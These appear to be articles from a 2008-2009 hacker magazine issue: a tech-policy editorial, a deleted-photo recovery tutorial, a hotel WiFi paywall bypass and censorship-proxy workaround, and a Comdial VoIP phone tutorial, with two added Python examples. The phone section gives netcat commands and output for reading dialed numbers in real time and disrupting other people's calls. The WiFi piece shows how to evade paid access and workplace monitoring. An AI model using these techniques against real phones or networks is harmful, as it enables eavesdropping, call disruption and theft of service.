We appear to be at one of those moments in history. At least in theory it seems like we've arrived at a turning point, where the opportunity exists for significant and lasting change to occur. This is not a time to be asleep.

The recent election that took place in the United States was historic for a number of reasons. For the first time, a member of a minority group was elected to the nation's highest office, an occurrence many never expected to see in their lifetimes. People from all over the country who had never before been involved in politics felt a new sense of hope and empowerment throughout the campaign, a feeling that culminated on Election Day when their victory became official. Unprecedented celebrations broke out throughout American cities and even in many foreign ones. This perception of true change, even if it never goes beyond a mere perception, has been inspiring and has given many of us an all too rare dose of optimism.

In the hacker/technological world, we have a particular reason to open our eyes. On a technical front, Barack Obama seems to get it, quite a bit more than his predecessors and opponents. He spoke out in favor of net neutrality years ago and seemed quite familiar with why it was important. His campaign clearly understood how to use high tech to their advantage, ranging from the widespread use of text messaging in order to reach supporters to embracing the Internet in getting the message out and rallying support. This is significant. Someone who has an actual grasp and comprehension of technology, along with its risks and essential freedoms, is poised to push policy in a direction that might benefit all of us. We could be on the verge of moving in a whole new direction.

Of course, we expect to be disappointed. Let us not forget how similar some of these hopes were in 1993, when the first Clinton administration took power. They were credited with moving the White House into the Information Age, replacing typewriters with computers, updating the phone system, and making technical competence the norm rather than the exception. But then, it wasn't too long before we were being faced with the Clipper Chip controversy.

For those who aren't familiar, implementation of this flavor of encryption (Clipper being for phones and phone systems) would have given the government the keys (literally) to all approved encrypted traffic, with many fearing that any other kind of encryption would soon become illegal. It was all based on a closed system so nobody really knew how secure it was. The idea of just trusting the government to do the right thing didn't really sit well with anyone understanding what was at stake. Strong opposition from the rapidly growing Internet community and the emergence of public encryption tools such as PGP helped to keep this bad idea from ever taking off, and the project officially died in 1996.

The Digital Telephony Law (or CALEA) made it orders of magnitude easier to tap telephone calls in digital switches. It was passed in 1994. The Digital Millennium Copyright Act (which 2600 was the first official victim of) became law in 1998 and created all sorts of restrictions and regulations on how people could use technology on their own computers or elsewhere, threatening the valued concepts of fair use and reverse engineering.

There are more examples of bad legislation coming out of the Clinton years that served to set back technology, as well as stifle creativity and free speech. The point here is not to list them but merely to acknowledge the fact that having one side or another in power is no guarantee that things are going to move in a positive direction. We certainly don't have to list all of the bad ideas and precedents that came out of the last eight years on everything from border searches of laptops to increased domestic surveillance - each in the name of "homeland security" and each having absolutely no effect on anything truly dangerous, but all too much of an effect on our everyday lives and our perceptions of what constitutes normality. We can only hope that reversal and termination of some of these policies is high on the priority list of the new administration.

The lesson here is that possession of mere familiarity with technology doesn't mean that the people running things will act in a manner that's fair to the rest of us. Oftentimes it works in exactly the opposite way. Power and control do strange things to people, after all.

A great parallel can be seen in schools. Who will allow you to experiment and accomplish more on the school computer network? The teacher who knows next to nothing about the subject? Or the self-proclaimed expert? For those of us who feel comfortable working and playing with technology, being left alone and avoiding micromanagement is all we really need. But when those who imagine themselves in charge feel as if they don't have total control and understanding over every nuance of the environment they're supervising, that's when fear and irrational behavior take hold. In school we see that in the form of unreasonable restrictions and punishment. In the government, we see it as an obsession with surveillance and speech monitoring. Those in charge are always in fear of being eclipsed by the very people they're supposed to be controlling. And we don't expect that underlying trepidation to change.

That is not to say that we can't hang onto some optimism. A quote like this provides us with ample reason:

"The Internet is the most open network in history. We have to keep it that way. I will prevent network providers from discriminating in ways that limit the freedom of expression on the Internet. Because most Americans only have a choice of only one or two broadband carriers, carriers are tempted to impose a toll charge on content and services, discriminating against websites that are unwilling to pay for equal treatment. This could create a two-tier Internet in which websites with the best relationships with network providers can get the fastest access to consumers, while all competing websites remain in a slower lane. Such a result would threaten innovation, the open tradition and architecture of the Internet, and competition among content and backbone providers. It would also threaten the equality of speech through which the Internet has begun to transform American political and cultural discourse. Accordingly, network providers should not be allowed to charge fees to privilege the content or applications of some websites and Internet applications over others. This principle will ensure that the new competitors, especially small or non-profit speakers, have the same opportunity as incumbents to innovate on the Internet and to reach large audiences. I will protect the Internet's traditional openness to innovation and creativity and ensure that it remains a platform for free speech and innovation that will benefit consumers and our democracy."

Those remarks came from an interview Obama gave back in 2007. He clearly has a handle on what the Internet is about and the potential it promises, as well as the threat posed by those entities who want to create more controls and restrictions. It is essential that this idealism not be sacrificed to the powerful interests that stand to benefit from the reining in of freedom. And that task falls to us - the people - to ensure that this promise is upheld.

For now, though, let us believe there is hope for some positive shifts in the road we've been going down. The worst thing we could do would be to resign ourselves to the opinion that change is never possible or that it can only occur when a phenomenal amount of conditions are met - which basically achieves the same effect as perpetual pessimism. Even in the best case scenario, we know there will be setbacks and policies that ultimately prove detrimental. But in this historic moment, there is great potential for steps to be taken and for a new beginning on a variety of levels. It will be worthwhile to pay close attention.

Page 4 -------------------- 2600 Magazine
Winter 2008-2009 ------------------ Page 5
INTRODUCTION TO
FORENSIC DATA RECOVERY
by Paradox

Recently while traveling in Cuba, I had the unfortunate luck of having an entire week's worth of photos inadvertently deleted from my digital camera's memory card. These photos were obviously not something I could have recreated and I hadn't yet been able to copy them off of the card onto the computer. Was all lost? No! By employing some basic computer forensics skills and some Linux kung-fu I was able to recover all of the lost photos.

First things first, we need to learn about what happens when you "delete" a file from a digital system like a computer, cellphone, camera, etc. While many hold the naive notion that a delete is final and that the bits go to the big /dev/null in the sky, it probably won't come as a surprise to many of you that this isn't the case at all.

While each filesystem handles deletion differently in technical implementation, the concept they utilize is the same. When you delete a file from the storage medium where your filesystem is located, the bits that your data is stored in are simply marked as "unused". Deletion by the definition of the word tends to imply an "overwriting" or "zeroing" procedure, i.e. actually getting rid of the data. Actually zeroing the bits that hold your to-be-deleted data would be a time intensive procedure, especially when you start to consider deletion of large files. The "mark as unused" solution accomplishes the same thing as far as the operating system is concerned; the data will eventually be overwritten by new data that is written to disk. This "eventually" clause is what we can exploit to save our data.

The first, and arguably most important, thing to take away from this over-simplified lesson on file deletion is that you must immediately disable writing to the device you wish to recover from. Operating systems and device firmware are complex and very large programs. They are constantly writing things to disk without your intervention. Background processes are swapped to disk, log files are being written to, and all sorts of data is being persisted. This all happens without your express desire! As mentioned, after deleting a file, the space it occupies is free game for anything that comes along needing disk space. Therefore, if a log file happens to be created immediately after you delete your file, there is a chance that some of that log file's data will end up overwriting your deleted file.

Thus the only way to be sure that your deleted data will remain in an uncorrupted and recoverable form is to immediately exit the operating system, shut down the device, pull the plug, eject the disk, and otherwise ensure that the device remains in a read-only state for the rest of this tutorial.

Now that we have the device in a state where we feel confident that no new data can be written to it, it would be wise to make an exact copy instead of working with the original. Since our deleted files are marked as free space at this point, we can't just mount the device as read only and use trusty old cp to copy our deleted files off. Instead, we need to create a byte-for-byte copy of the device including all of the free space, since our deleted data is tucked away somewhere in there.

To do this, we'll use the Linux dd command. This command comes installed with every modern distribution of Linux I have ever encountered, and will surely be installed on yours. My recommended procedure is to download and burn the Knoppix Linux live CD. This has several benefits, most importantly: Knoppix will mount any applicable filesystems it finds on the computer as read-only by default. This is perfect for our purposes since we don't want to accidentally write any data to the device.

Once you have booted into the Knoppix environment we need to find the Linux device name of our target device and the partition number. In the case of my camera it was /dev/sdb1. Serial device B, partition 1. I found this by running:

ls -l /dev/disk/by-id/usb*

Obviously if you are searching for a non-USB device you would exclude the "usb*" section of the command that filters the results.

Once we have the Linux device name we can begin creating an image of the disk. First, make sure you have enough free space on a write-enabled device to store the disk image. The disk image will be the same size as the total capacity of the device we are trying to recover from. Since I was recovering images from a 1GB memory card, I needed to make sure I had ~1GB free on my computer's hard drive. To begin the imaging process enter the command:

sudo dd if=<input device/partition> of=<outputFile>

i.e. in my case I ran:

sudo dd if=/dev/sdb1 of=/home/daniel/diskImage.dd

This imaging process may take a while depending on the size of the disk partition you are imaging. In my case, it took approximately 15 minutes. Once the image process is complete, you can safely remove the device from your system and store it in a safe place. With our disk image in hand we can perform the recovery from any Linux machine.

Now while the tool we are planning to use to recover our data can work out-of-box with a dd image, some tools can't. If you are planning to use a tool that wants to work with the filesystem itself then you'll want to mount this dd image as a "loopback" device. To do that you would run:

sudo mount -o loop -t <type> <imageLocation> <mountLocation>

i.e. in my case I ran:

sudo mount -o loop -t vfat /home/daniel/diskImage.dd /mnt/diskFiles

Make sure that your mount location exists before running this command. In my case, if the "diskFiles" folder didn't exist, the mount would fail.

We can now run our recovery tool to scrape out as many files as we can from the free (i.e. deleted) space of our device. The tool we are going to use is called Foremost. It is a very simple to use tool that was originally created by the U.S. Air Force and later made open source and public. It has the ability to recover a few common filetypes automatically. These types include images, executables, documents, movies, etc. It supports ext3, fat, and ntfs filesystems, so chances are that your device will be supported. More information on the tool can be found at the website provided at the end of this tutorial. On a Debian system it was just a matter of running the following command to install foremost.

sudo apt-get install foremost

We are now ready to recover our files. If you know the specific type of file you wish to recover you can save time by telling Foremost to only recover that type. In my case I knew my camera saved the images as JPG files. So I ran:

sudo foremost -t jpg -i /home/daniel/diskImage.dd -o /home/daniel/recovered

If you wanted Foremost to try and recover all types of files it could (this may take a long time) you would run:

sudo foremost -t all -i <imageLocation> -o <outputFolder>

The -t argument is what tells Foremost which kind of files you want to recover. For instance, if you wanted to recover Office-type documents such as .ppt and .doc you would use -t ole. Consult the documentation to find out which file-type flags are supported. Again, it is important that the output folder exists before you run Foremost. Once it has finished you will have hopefully recovered the data you were looking for to the recovery folder you specified. There is however one more hurdle to jump before you can find out. Foremost (like most of the tools we've used so far) can only operate as root. As such the output files it generated are also owned by root. To fix this we'll chown them to our user.

sudo chown -R <yourUser>:<yourUser> <outputFolder>

In my case that meant running:

sudo chown -R daniel:daniel /home/daniel/recovered

You can now change directories into your recovered folder. You'll find an audit text file in the root of your recovered folder outlining what Foremost was able to recover. Most importantly though, you will find all of the recovered files organized into folders by type. In my case I found all 75 of my missing JPGs in the /home/daniel/recovered/jpg/ folder. Hopefully you found your files too!

This tutorial should serve as a good starting point for your journey into understanding computer forensics. Advanced topics exist to supplement your knowledge. For instance, Foremost is limited to specific filetypes. If you want to recover other files you may have to resort to using advanced software like Autopsy and Sleuthkit, but these require a deeper understanding of computer forensics. Undoubtedly you will find that the concepts you learned in this tutorial will serve you well if you attempt to further your knowledge.

Resources
http://foremost.sourceforge.net/
http://Linux.die.net/man/1/dd
http://Linux.die.net/man/8/mount
http://www.knoppix.org/
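What Foremost is actually doing when it runs with -t jpg over the dd image is signature carving: it ignores the filesystem and scans the raw bytes for the JPEG start and end markers. The following is an added example written for this page, not Foremost's code, that does the same for JPEGs over a constructed stand-in for the camera image; the marker constants and the 20 MB size cap are assumptions, and the image bytes are constructed.

```python
"""Minimal header/footer carver in the spirit of Foremost's -t jpg mode."""
from __future__ import annotations

import os
import sys
from dataclasses import dataclass

# A JPEG starts with the SOI marker FF D8 followed by an APPn marker
# (FF E0 for JFIF, FF E1 for Exif) and ends with the EOI marker FF D9.
JPEG_HEADERS = (b"\xff\xd8\xff\xe0", b"\xff\xd8\xff\xe1")
JPEG_FOOTER = b"\xff\xd9"
# Carvers cap the size of one hit so a missing footer cannot swallow the
# rest of the image.  20 MB is a constructed default, not Foremost's.
MAX_JPEG_SIZE = 20 * 1024 * 1024


@dataclass
class CarvedFile:
    offset: int   # byte offset of the header inside the image
    data: bytes   # header through footer, inclusive


def carve_jpegs(image: bytes, max_size: int = MAX_JPEG_SIZE) -> list[CarvedFile]:
    """Return every complete JPEG in *image*, found purely by signature.

    The filesystem is never consulted, which is why this still finds files
    whose directory entries were marked "unused" by a delete.
    """
    found: list[CarvedFile] = []
    pos = 0
    while True:
        # Nearest candidate header of any accepted kind, at or after pos.
        starts = [s for s in (image.find(h, pos) for h in JPEG_HEADERS) if s != -1]
        if not starts:
            break
        start = min(starts)
        window_end = min(len(image), start + max_size)
        end = image.find(JPEG_FOOTER, start + 4, window_end)
        if end == -1:
            # Header without a footer in range: the tail was overwritten or
            # the file is truncated.  Skip the header and keep scanning.
            pos = start + 4
            continue
        end += len(JPEG_FOOTER)
        found.append(CarvedFile(offset=start, data=image[start:end]))
        pos = end
    return found


def write_carved(files: list[CarvedFile], out_dir: str) -> list[str]:
    """Write hits to out_dir/jpg/ plus an audit.txt, mirroring Foremost's layout."""
    jpg_dir = os.path.join(out_dir, "jpg")
    os.makedirs(jpg_dir, exist_ok=True)
    paths: list[str] = []
    with open(os.path.join(out_dir, "audit.txt"), "w") as audit:
        for f in files:
            name = f"{f.offset:08d}.jpg"
            path = os.path.join(jpg_dir, name)
            with open(path, "wb") as fh:
                fh.write(f.data)
            audit.write(f"{name}\t{len(f.data)} bytes\toffset {f.offset}\n")
            paths.append(path)
    return paths


def fake_jpeg(payload: bytes, app_marker: bytes = b"\xff\xe0") -> bytes:
    """Constructed JPEG-shaped blob: SOI, APPn marker, payload, EOI."""
    return b"\xff\xd8" + app_marker + payload + JPEG_FOOTER


def build_sample_image() -> bytes:
    """Constructed stand-in for a dd image of a camera card.

    Two intact photos sit in free space between runs of junk; a third lost
    its tail after deletion and must not come back as a complete file.
    """
    junk = b"\x00" * 512
    return (
        junk
        + fake_jpeg(b"photo-one" * 10)
        + b"\xde\xad\xbe\xef" * 64
        + fake_jpeg(b"photo-two" * 10, app_marker=b"\xff\xe1")
        + junk
        + b"\xff\xd8\xff\xe0" + b"truncated" * 10   # header, no footer
    )


if __name__ == "__main__":
    out_dir = sys.argv[1] if len(sys.argv) > 1 else "recovered"
    hits = carve_jpegs(build_sample_image())
    for path in write_carved(hits, out_dir):
        print("recovered", path)
```

Pointing carve_jpegs at the bytes of a real dd image recovers intact JPEGs the same way; a header whose footer was already overwritten is skipped rather than carved as a corrupt file.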
Hacking Dubai and More Internet Proxy Loopholes
by forgotten247

I recently had the opportunity to go to Dubai for a work function. I was put up at the Jumeirah resort, a nice little spot on the gulf with some great views, restaurants, and clubs. As any reader of 2600 would do, the first thing I did when I got to the room was see how I could get online.

On the desk was a card outlining the process to do so. I could plug in an Ethernet cable, go through a few screens, and once registered I'd be able to use wired or wireless access throughout the resort. Just what I needed, beach-side WiFi to enjoy the net and the Gulf at the same time.

No worries, I thought, and I started the process by disabling the Airport on my MacBook Pro, plugging in the Ethernet cable, and firing up Safari. I was prompted with a "Jumeirah Hotel Internet Access" landing page, and then clicked on the "Internet Access" link. From there I chose "In-House Guest" and accepted the terms and conditions which were pretty standard.

Then something hit me about the page to register my system. You'd think a hotel that charges $1,000+ US dollars a night (yes, it was that expensive) would throw in Internet access, but no, they didn't. The screen that came up would allow users to register for one hour of Internet access for $30 AED (about $8 US) or $150 AED ($40 US) for 24 hours. After paying, the system would provide a username and password that could then be entered into a form on the web system to gain access. This was a bit of a surprise seeing as the card on the desk made no mention of the added cost, but I was game to see if there were any unique ways to gain access.

To get started I disconnected the Ethernet cable, switched to Airport, and went to the landing page to enter a random username and password. I had no luck there. OK, try number two, would entering a name with a blank or random password work? Nope.

I had no intention of paying $40/day for Internet access for the next week, even at my company's expense, so I pulled out my iPhone to see if I could get cell-network web access. Having a US-based iPhone locked for AT&T meant no luck in that arena. I also had a BlackBerry and it worked fine on the local provider network, however I didn't want to browse using BlackBerry's watered-down web interface.

Things were starting to look grim, but I was not willing to give in. I joined the iPhone to the hotel WiFi setup and went through the registration pages, hoping for some luck. I noticed differences on the page when viewed through iPhone, from what I had seen on the laptop. Mainly, quite a few sections of text that had been present on the laptop didn't show up on the iPhone. Instead there was an icon that indicated there was content that the mobile Safari browser could not load.

This looked promising. I finished going through the registration pages and then I got it. On the page where the laptop's browser was prompting me to select the amount of time I wanted to pay for, I received a message saying that the registration process was completed, and I was in. I quickly typed in a few URLs and indeed I was online.

It seemed the registration and access granting pages were dependent on web components that were not compatible with mobile Safari. Using that knowledge as a jumping point, I was able to find that the web application used to provide Internet access used Java components. For whatever reason the developers had decided that instead of failing closed (meaning that if there was an error with the application, no access would be granted), they failed open. When the Java components didn't run, the system defaulted to letting people through and granting access. Dummies!

Now I do think the iPhone is a great little device, but I didn't want to do all my surfing on my phone, so with a little help from the tinyproxy native application I had installed on it (you had to assume it was jailbroken, didn't you?) I pointed my laptop to use the iPhone as a proxy and off I went, free WiFi access across the iPhone to the laptop.

Before I left I circled back to validate the security hole that allowed this, and found that disabling Java on a browser on the laptop resulted in the same full access without needing to go through the registration process. I also noticed that in the areas of the hotel where there were business meeting rooms the WiFi networks were completely unrestricted, which I found is the case at most business/convention centers and worth noting, although not much good to get online from the privacy of your room, or the allure of the beaches.

The moral of this segment of the story is twofold: First, if you run into any WiFi apps requiring registration, make sure to test them out with things like Java or ActiveX disabled, because you may be pleasantly surprised; Second, a word to developers, you really need to think beyond end-users accessing the network on traditional setups and should always fail closed when in doubt.
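The fail-open versus fail-closed distinction the author draws for developers, as an added example written for this page (constructed, not the hotel's portal code): both decision functions receive the same session; they differ only in what happens when the payment check never produced an answer or raised an error. The verify_token helper and its PAID-<digits> token format are assumptions standing in for the portal's Java component.

```python
"""Fail-open versus fail-closed access decisions for a captive portal."""
from __future__ import annotations

from dataclasses import dataclass, field
from enum import Enum
from typing import Callable, Optional


class Decision(Enum):
    GRANT = "grant"
    DENY = "deny"


@dataclass
class Session:
    client: str
    # Value posted back by the client-side payment component.  None models
    # the component never having run, the mobile Safari case in the story.
    payment_token: Optional[str] = None
    audit: list[str] = field(default_factory=list)


def verify_token(token: str) -> bool:
    """Hypothetical verifier: a token is valid when it reads PAID-<digits>.

    Malformed input raises, standing in for "an error with the application".
    """
    prefix, sep, digits = token.partition("-")
    if not sep or prefix != "PAID":
        raise ValueError(f"malformed token {token!r}")
    return digits.isdigit()


def decide_fail_open(session: Session) -> Decision:
    """The portal as the author found it: any failure in the check lets the user in."""
    try:
        if session.payment_token is None:
            # Component never reported back; nothing contradicts "paid".
            return Decision.GRANT
        if verify_token(session.payment_token):
            return Decision.GRANT
        return Decision.DENY
    except Exception:
        # Error path falls through to the permissive default.
        return Decision.GRANT


def decide_fail_closed(session: Session) -> Decision:
    """The corrected portal: grant only on a positive, verified answer."""
    decision = Decision.DENY          # the default that every other path keeps
    try:
        if session.payment_token is not None and verify_token(session.payment_token):
            decision = Decision.GRANT
    except Exception as exc:
        # Record the failure; an exception must never widen access.
        session.audit.append(f"{session.client}: token check failed: {exc}")
    if decision is Decision.DENY:
        session.audit.append(f"{session.client}: access denied")
    return decision


Policy = Callable[[Session], Decision]


def compare(policy_a: Policy, policy_b: Policy) -> dict[str, tuple[Decision, Decision]]:
    """Run two policies over constructed sessions covering the cases in the story."""
    cases = {
        "paid guest":        Session("laptop-paid", "PAID-4242"),
        "not paid":          Session("laptop-unpaid", "PAID-none"),  # well-formed, invalid
        "component missing": Session("iphone", None),               # Java never ran
        "garbage token":     Session("laptop-broken", "oops"),      # verifier raises
    }
    return {name: (policy_a(s), policy_b(s)) for name, s in cases.items()}


if __name__ == "__main__":
    for name, (open_d, closed_d) in compare(decide_fail_open, decide_fail_closed).items():
        print(f"{name:18} fail-open={open_d.value:<5} fail-closed={closed_d.value}")
```

The two policies agree on the paid and the honestly-unpaid guest; they part ways exactly on the "component never ran" and "component errored" rows, which are the rows a browser without Java exercises.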
Now, the digital adventures in Dubai didn't stop there. After browsing a few sites I ran into a nasty little page telling me "SITE BLOCKED", in big bold red letters, with sub-text, "We apologize the site you are attempting to visit has been blocked due to its content being inconsistent with the religious, cultural, political and moral values of the United Arab Emirates." Just for good measure it was written in English and Arabic.

[Screenshot: the UAE "SITE BLOCKED" page, in Arabic and English. English text: "We apologize the site you are attempting to visit has been blocked due to its content being inconsistent with the religious, cultural, political and moral values of the United Arab Emirates. If you think this site should not be blocked, please visit the Feedback Form available on our website."]

Now, I can say for sure that there are plenty of sites I go to on a regular basis that are inconsistent with the moral values of the UAE, so, let's get around this thing shall we? This one was not too difficult, as I have run into similar blocks in China and other heavily regulated areas. The way these typically work is using web proxy servers or appliances with filtering technology which classify sites by type. Access is then allowed or denied based on type. SmartFilter, as covered in the Spring 2008 issue, is one of these technologies. The article did a good job of describing a solution to get around SmartFilter, but it was a bit overcomplicated for my liking. First, it relied on people having an Internet-facing host that you could get shell access on. You also needed the ability to fire up an ssh listener on that server, and to set up a SOCKS proxy on your client system.

While this certainly is a viable technical solution, and an educational article, the assumption that people have access to an Internet-facing server they can set a service up on is a bit beyond reality, even for 2600 readers. If you are in a corporate environment there is a good chance that the PC policies won't let you install PuTTY or run unapproved services on the client. Places with Internet proxy filters typically also have some level of infrastructure monitoring going on, as well as security policies enforced through Active Directory and/or PAC files that won't allow installation of software or changing your web browser settings.

I have a different approach to getting around Internet filtering proxies that puts fewer requirements on the users, both on the server and client side. Rather than just give the solution, let's take a walk-through of how we get there. To start with, SmartFilter and other filters are based on the URL or IP of the site you are going to. They do not filter on content, at least none that I have run into yet. This is very important. The default reaction to this knowledge should be that if you can't get to a site because the host is blocked, go to a site on a host that isn't blocked that you can get the content through.

Let's try that out. Hop on over to Google, I haven't found them blocked yet, and type in a search that would result in the URL you want to view. On the search results screen instead of clicking on the title of the page, click on the "Cached" link. Sweet, I'm in, are you? Probably. The cached content is served from Google's servers which are not blocked, since the host name in the URL is for Google, not the host which the proxy doesn't like. This is a quick and dirty way to get to a single page that is blocked, but Google's cache isn't always complete, following links from it isn't always easy, and the pages don't always render correctly.

Let's keep going down with the intention of getting access to all the content, not just the cached image of the blocked host. Most of you should be well aware of anonymizer sites that you can go to, enter a URL, and proxy the content through their servers. The intention of these sites is to improve your security so the web servers don't know who is making the request, however they can also be used for you to get content from a site, without entering that site's URL. That sounds exactly like what we need, but unfortunately most of these are well known by proxy filters, so going to one of those is not going to cut it. Are we stuck? Nope, we just need an anonymizer site that the proxies don't know about, and the best way to get one is to host your own.

Now, writing a web app to do this is very simple, but it is even easier just to implement one that already exists. I mean why spend time doing something that's already been done. Much like the prior article on getting around SmartFilter, you do still need some Internet-facing server space for this, but it can come in the form of a simple, low cost web hosting provider. No shell access or ability to run services needed. Just a provider supporting PHP or ASP, which almost any decent provider will support.

The first thing needed is to set up the Internet-facing server side. Jump out online and do a search for "web proxy <web language>" where the web language is PHP or ASP, depending on the host you are using. PHProxy (http://sourceforge.net/projects/poxy/) is one that comes to mind for PHP, and is near the top of the search results right now, although that one is a little dated. It will work fine, as will almost any others you come across. So, take whichever proxy solution interests you, drop it on your hosted web provider space, which hopefully has a nice inconspicuous host name, and point your web browser to it. Government-enforced proxies, such as Dubai's, as well as business/corporate proxies, should let you slide right by. From there you should just need to type in the URL you want to pull up, click a button, and sit back as the page you wanted is displayed in its full form. Hopefully the web proxy you grabbed dynamically updates any HREF links so as you navigate around, all future clicks go through your proxy. If it didn't, grab a different one. Most support doing this.

The beautiful part of this approach is that as long as the host name you are running your proxy from doesn't raise any suspicion, there would be no reason to have to change your browser settings on the client. This is great if you are in a work environment where those settings are locked down.

One word of caution for business users though, SmartFilter and other web proxy solutions typically are used to provide reports on the most visited websites, and the most active Internet users. You should try to fly under that radar by only using your proxy when absolutely necessary, and keep browsing from work at a minimum. The name of your host is important as well. If it does pop up on one of those reports the more official it looks the better. Don't register "iusethistobypassmyworksecurity.com" or "myporngateway.com" or you may not be in that job long enough to use it!

So, that concludes this chapter of my Dubai adventures and another method of getting around Internet proxy filters. I enjoyed that week of sun, free net access, and freedom to digitally go wherever needed. All thanks to a poorly written WiFi registration app, an iPhone, and a personal web proxy gateway.

I do have to add that spending too much time in front of your system in Dubai would be quite a waste. Anyone who can get there should plan on not sleeping too much - hitting the beaches all day and partying at the clubs all night is the only way to go, even when your online exploits or World of Warcraft buddies are calling. Just save up, Dubai isn't cheap!
by Metalxl000
metalxl000@yahoo.com

For those who are unfamiliar, Comdial phones are Session Initiation Protocol (SIP) phones that are used in offices. Instead of traditional phone lines, these phones connect to your local network via CAT5. Although I have not worked with Cisco phones, from what I have read they are similar.

In this article I will be talking about model "CONVERSip EP300", although I'm sure that these techniques will work on other models. The first step in exploring the phone is to find its IP address. There are two ways of doing this. The first way is to walk right up to the phone and get the information.

To do this look at the LCD screen on the front of the phone. Right below the LCD screen are three buttons. Each corresponds with a menu option on the screen. The three default options are "VMAIL" (Voice mail), "DND" (Do Not Disturb), and "MENU". Let's choose "MENU" then "NEXT". When you see "2 Info" on the LCD Screen press "ENTER". Now press "NEXT" twice. This brings you to a screen that says, "3 System Info". Press "ENTER" and you will see "1 Network Info". Press "ENTER" again. Press "NEXT" three times and your screen will say, "4 IP Address". Press "ENTER" one last time and you will see the IP Address of the phone.

Now, if you can't physically get to the phone, you can find it easily with nmap, a great tool for scanning networks. I'm not going to go into detail on nmap, as there have been plenty of articles written on it, and there is plenty of info available on the web. Once you run a full scan on the phone with nmap you will find that ports 8001, 8002, 8003, 9026, 9027 are open. Ports 8001, 8002, 8003 I believe are used for the communication itself. Port 9026 asks for a user name and password, which I don't know, but if I find them I will let you all know. Finally we get to port 9027, which we will be looking at today.

I will be using NetCat in this tutorial, but telnet or similar programs will work as well. Let's say our IP address is 192.168.22.237, we would connect to the phone with NetCat and you would get the following output:

/home/user> nc 192.168.22.237 9027
[17:17:12.428] commandPoll: got listenfd event
[17:17:12.439] commandPoll: action->fdPtr=9 accepted
[17:17:12.439] Connected to station 237
[17:17:12.441] Phone Version: 3.0.026
[17:17:12.439] Phone Build Date: 06/05/2008 17:17:12
[17:17:12.439] Phone MD5Sum: 3777ad4b3ac20ae9b56391267e81bb90
[17:17:12.450] Boot Version: 1.04
[17:17:12.451] Boot Build Date: 05/03/2005 22:40:17
[17:17:12.450] Boot MD5Sum: 5b84e34dcf06235e3763c755a9c57e9c

Now that you are connected, type "?" (without the quotes) and press "Enter". This will bring up the help menu as follows:

*** Console commands
[19:42:19.089] @ [destip] - Send debug log to remote syslog at [destip] or turn off if [destip] not specified
[19:42:19.100] ! [agressiveness] - Set speakerphone agressiveness
[19:42:19.100] 0..7 - debug flag level
[19:42:19.099] a - debug flag toggle
[19:42:19.098] A - verbose flag toggle
[19:42:19.099] B - Generate Test Tone on Bzr
[19:42:19.109] c - core selection alt between 1, 2
[19:42:19.109] C - crash write to 0
[19:42:19.108] D - 1 - Si3000, Default - Dump DSP statistics
[19:42:19.109] d - increase dspDriverVerbose (wrap around range 0-3)
[19:42:19.108] E - Dump EPROM info
[19:42:19.110] e - Dump Ethernet stats
[19:42:19.118] e 0 - reset Ethernet stats
[19:42:19.119] g - gdb spin loop
[19:42:19.120] H - Switch to Headset
[19:42:19.118] h - Switch to Handset
[19:42:19.120] I - Switch to Mic/Spkr
[19:42:19.119] i - Adjust mic input
Winter 2008-2009 ----------------- Page 11
    gain (@DSP) +1dB (wraps around)
[19:42:19.128] k - info
[19:42:19.129] K - ticks since last key event
[19:42:19.129] L - LED test
[19:42:19.128] M - Increase ADC Rx (Mic) gain +1
[19:42:19.129] m - Decrease ADC Rx (Mic) gain -1
[19:42:19.139] o - Toggle voice activity detection
[19:42:19.140] p - Play Welcome to SoundPoint
[19:42:19.140] q - Request DSP Statistics
[19:42:19.138] r - Inc Spkr Out Gain (@DSP)
[19:42:19.139] s - print station number of this phone
[19:42:19.140] T - Mute ALL Inputs and Outputs
[19:42:19.149] t - Generate DSP tones
[19:42:19.148] U - Inc spkr Vol. (Dec Attenuation)
[19:42:19.148] u - Dec spkr Vol. (Inc Attenuation)
[19:42:19.149] V - Inc ADC Tx PGA (O/P) gain +1
[19:42:19.150] v - Dec ADC Tx PGA (O/P) gain -1
[19:42:19.148] W - Inc ADC Rx PGA (I/P) gain +1
[19:42:19.150] w - Dec ADC Rx PGA (I/P) gain -1
[19:42:19.159] X - Inc ADC Line Out gain (Dec Attenuation)
[19:42:19.158] x - Dec ADC Line Out gain (Inc Attenuation)
[19:42:19.159] Y - Increase Line In gain
[19:42:19.160] y - Decrease Line In gain
[19:42:19.159] z - Test LCD/Notify msgs
[19:42:19.169] Z - Play a tone
Each of the letters listed runs the function indicated when you type the letter and press "Enter". So if you type "k" and press "Enter," it will dump a bunch of system info to your screen such as mic and speaker volume, numbers dialed, calls received, call times, and a bunch of other info. If someone is using the phone you can use the "u" and "U" command to raise and lower the volume on the phone. Command "I" will switch on the speaker of the phone while "h" will set it back to the headset (this is fun to do if you are in the same room as the person on the phone). "T" will "Mute ALL Input and Outputs", but I don't know how to unmute them unless they hang up and redial. So, only use the "T" command if you want to disconnect someone's call.

Some other commands are not as fun. For example "z" will cause a whole lot of messages to flash on the screen of the phone, but all the messages flash for about one tenth of a second, making it very hard to notice.

You may also notice that if someone picks up the headset or presses buttons on the phone while you are connected you will receive some output on your screen. By default the output is mostly useless, telling you that buttons have been pressed, but not which buttons. But, if you change the "debug flag level" by choosing a number from 0 through 7 you can change the amount of information displayed.

Level "3" is when things start getting useful. It allows you to see what is being displayed on the LCD screen of the phone. And since the LCD screen displays the numbers being dialed and the numbers of incoming calls, you can see, in real time, who is calling whom. Of course the more output you have the harder it is to keep track of, especially when you get up to level "6" or "7". This is where your command line skills could come in handy. Using a simple command such as grep you can filter out unwanted info. To only display messages on line one of the LCD screen, which is where numbers being dialed are displayed, set the debug level to at least "3" and try the following set of commands:

/home/user> nc 192.168.22.237 9027 | grep LCDLine1
[20:55:52.687] LCDLine1: ENTER NUMBER
[20:55:53.109] LCDLine1: PRI
[20:55:54.210] LCDLine1: PRI
[20:55:54.728] LCDLine1: 1
[20:55:55.059] LCDLine1: 18
[20:55:55.358] LCDLine1: 180
[20:55:55.518] LCDLine1: 1800
[20:55:55.868] LCDLine1: 18004
[20:55:56.109] LCDLine1: 180046
[20:55:56.339] LCDLine1: 1800466
[20:55:56.449] LCDLine1: 18004664
[20:55:56.608] LCDLine1: 180046644
[20:55:56.808] LCDLine1: 1800466441
[20:55:56.987] LCDLine1: 18004664411

As you can see, the grep command filtered out a lot of unwanted info and showed the number being dialed in real time. Well, this concludes this tutorial. This is just part one of my COMDIAL articles. I hope to write at least two more.

Well, I guess this is where I do shout-outs to people. So, hey Kenn, James, and Eric.
